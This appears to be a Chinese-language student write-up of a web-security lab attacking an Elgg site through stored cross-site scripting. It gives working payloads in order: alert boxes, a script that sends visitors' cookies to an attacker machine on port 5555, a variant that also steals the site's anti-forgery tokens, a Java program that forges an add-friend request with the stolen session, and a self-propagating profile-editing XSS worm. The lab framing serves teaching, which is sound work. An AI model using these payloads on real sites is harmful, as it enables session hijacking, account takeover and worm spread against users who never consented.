環境配置:
- 啓動apache2服務:sudo service apache2 start
- 配置Apache服務,在/etc/apache2/sites-available/default中,配置如下:
實驗內容:
Task 1:顯示Alert窗口
在用戶名boby下的修改信息這一網頁中,在個人說明中插入alert信息:
<script>alert(‘XSS’);</script>
如下圖所示:
登陸用戶名bin,然後查看boby的信息,結果如下,會彈出一個窗口,結果如下:
將惡意內容放入js文件中,然後把鏈接指向js文件,具體指令如下:
attack.js文件的內容如下,將該文件放入xss.lagelgg.com的根目錄下(/var/www/XSS/elgg/)
bin用戶訪問boby用戶的信息時,攻擊成功:
Task2:展示用戶的cookie信息
在boby用戶信息的編寫框中輸入如下攻擊信息:
<script>alert(document.cookie);</script>
然後bin用戶查看boby用戶的信息時,出現如下彈框:
Task 3:
在boby用戶信息的編寫框中輸入如下攻擊信息(其中192.168.47.181爲攻擊中機器的ip地址):
<script>document.write('<img src =http://192.168.47.181:5555?c='+escape(document.cookie) + ' >');</script>
然後在攻擊者機器中運行echoserv文件,讓它監聽5555端口,當bin用戶查看boby的用戶信息的時候,bin用戶的cookie信息被髮送到攻擊者的機器上:
Task4:用偷來的Cookie來進行會話攻擊
首先在boby的用戶信息編寫框中輸入如下信息:
<script>document.write('<img src=http://127.0.0.1:5555?c='+escape(document.cookie)+'&'+elgg.security.token.__elgg_ts+'&'+elgg.security.token.__elgg_token+' >');</script>
該js腳本的作用就是將訪問boby用戶信息的用戶的cookie和__elgg_ts,__elgg_token信息發送到攻擊者機器。
用LiveHttpHeaders工具來查看加好友的包的情況:
根據抓的包的信息來完成程序的構造:
import java.net.*;
import java.io.*;
public class HTTPSimpleForge {
public static void main(String[] args) throws IOException {
try {
int responseCode;
InputStream responseIn=null;
// URL to be forged.
URL url = new URL ("http://www.xsslabelgg.com/action/friends/add?friend=41&__elgg_ts=1464013312&__elgg_token=c2aa7157f41d7d265d4f082aa0b03b4f");
URLConnection urlConn = url.openConnection();
if (urlConn instanceof HttpURLConnection) {
urlConn.setConnectTimeout(60000);
urlConn.setReadTimeout(90000);
}
urlConn.addRequestProperty("Host","www.xsslabelgg.com");
urlConn.addRequestProperty("User-Agent","Sun JDK 1.6");
urlConn.setRequestProperty("Accept","text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
urlConn.setRequestProperty("Accept-Language","en-us,en;q=0.5");
urlConn.setRequestProperty("Accept-Encoding","gzip,deflate");
urlConn.setRequestProperty("Referer","http://www.xsslabelgg.com/profile/charlie");
urlConn.setRequestProperty("Cookie","Elgg=rpmo7shdmq6b6kdg38o76oo3j5");
urlConn.setRequestProperty("Connection","keep-alive");
urlConn.setDoOutput(true);
String data="username=charlie&[email protected]";
OutputStreamWriter wr = new OutputStreamWriter(urlConn.getOutputStream());
wr.write(data);
wr.flush();
// HttpURLConnection a subclass of URLConnection is returned by
// url.openConnection() since the url is an http request.
if (urlConn instanceof HttpURLConnection) {
HttpURLConnection httpConn = (HttpURLConnection) urlConn;
// Contacts the web server and gets the status code from
// HTTP Response message.
responseCode = httpConn.getResponseCode();
System.out.println("Response Code = " + responseCode);
// HTTP status code HTTP_OK means the response was
// received sucessfully.
if (responseCode == HttpURLConnection.HTTP_OK) {
// Get the input stream from url connection object.
responseIn = urlConn.getInputStream();
// Create an instance for BufferedReader
// to read the response line by line.
BufferedReader buf_inp = new BufferedReader(
new InputStreamReader(responseIn));
String inputLine;
while((inputLine = buf_inp.readLine())!=null) {
System.out.println(inputLine);
}
}
}
} catch (MalformedURLException e) {
e.printStackTrace();
}
}
}
更改攻擊者機器的/etc/hosts文件,使其修改/etc/hosts文件:
將www.xsslabelgg.com的ip地址改爲192.168.47.185(受害者機器的ip)
在受害者機器上登入samy用戶,首先查看samy的好友情況,可知現在samy沒有好友:
Samy查看boby的信息,其cookie信息,cookie和__elgg_ts,__elgg_token信息都發回了攻擊者機器:
將編寫的攻擊程序的cookie,__elgg_ts,__elgg_token等信息填充好,編譯程序Javac HTTPSimpleForge.java,然後運行java HTTPSimpleForge,收到html的返回信息:
可知結果爲200,查看samy的好友信息如下:
可知攻擊成功。
Task 5:寫一個XSS蠕蟲
首先登陸boby用戶,修改用戶信息,查看包的情況如下:
根據包的情況編寫worm.js程序:
var nod = document.getElementsByClassName("elgg-border-plain elgg-transition");
var user = nod[0].attributes.getNamedItem("alt").nodeValue;
if(user != 'Boby')
{
var Ajax=null;
// Construct the header information for the HTTP request
Ajax=new XMLHttpRequest();
if(Ajax == null)
alert("Ajax is null");
Ajax.open("POST","http://www.xsslabelgg.com/action/profile/edit",true);
Ajax.setRequestHeader("Host","www.xsslabelgg.com");
Ajax.setRequestHeader("User-Agent","AJAX 1.2");
Ajax.setRequestHeader("Accept","text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
Ajax.setRequestHeader("Accept-Language","en-US,en;q=0.5");
Ajax.setRequestHeader("Accept-Encoding","gzip,deflate");
var node = document.getElementsByClassName("elgg-border-plain elgg-transition");
var username = node[0].attributes.getNamedItem("alt").nodeValue;
Ajax.setRequestHeader("Refer","http://www.xsslabelgg.com/profile/"+username+"/edit");
Ajax.setRequestHeader("Keep-Alive","300");
Ajax.setRequestHeader("Connection","keep-alive");
Ajax.setRequestHeader("Cookie",document.cookie);
Ajax.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
// Construct the content. The format of the content can be learned
// from LiveHTTPHeaders.
var content = "__elgg_token="+elgg.security.token.__elgg_token+"&__elgg_ts="+elgg.security.token.__elgg_ts+"&name="+username+"&description=I'm stupid&guid="+elgg.session.user.guid;
Ajax.setRequestHeader("Content-Length",content.length);
// Send the HTTP POST request.
Ajax.send(content);
}
現在在boby的profile中添加worm:
更改完畢:
現在以samy的身份登入,首先查看一下samy的信息,發現什麼都沒有描述:
然後其訪問boby的個人信息:
再次查看自己的信息:
攻擊成功。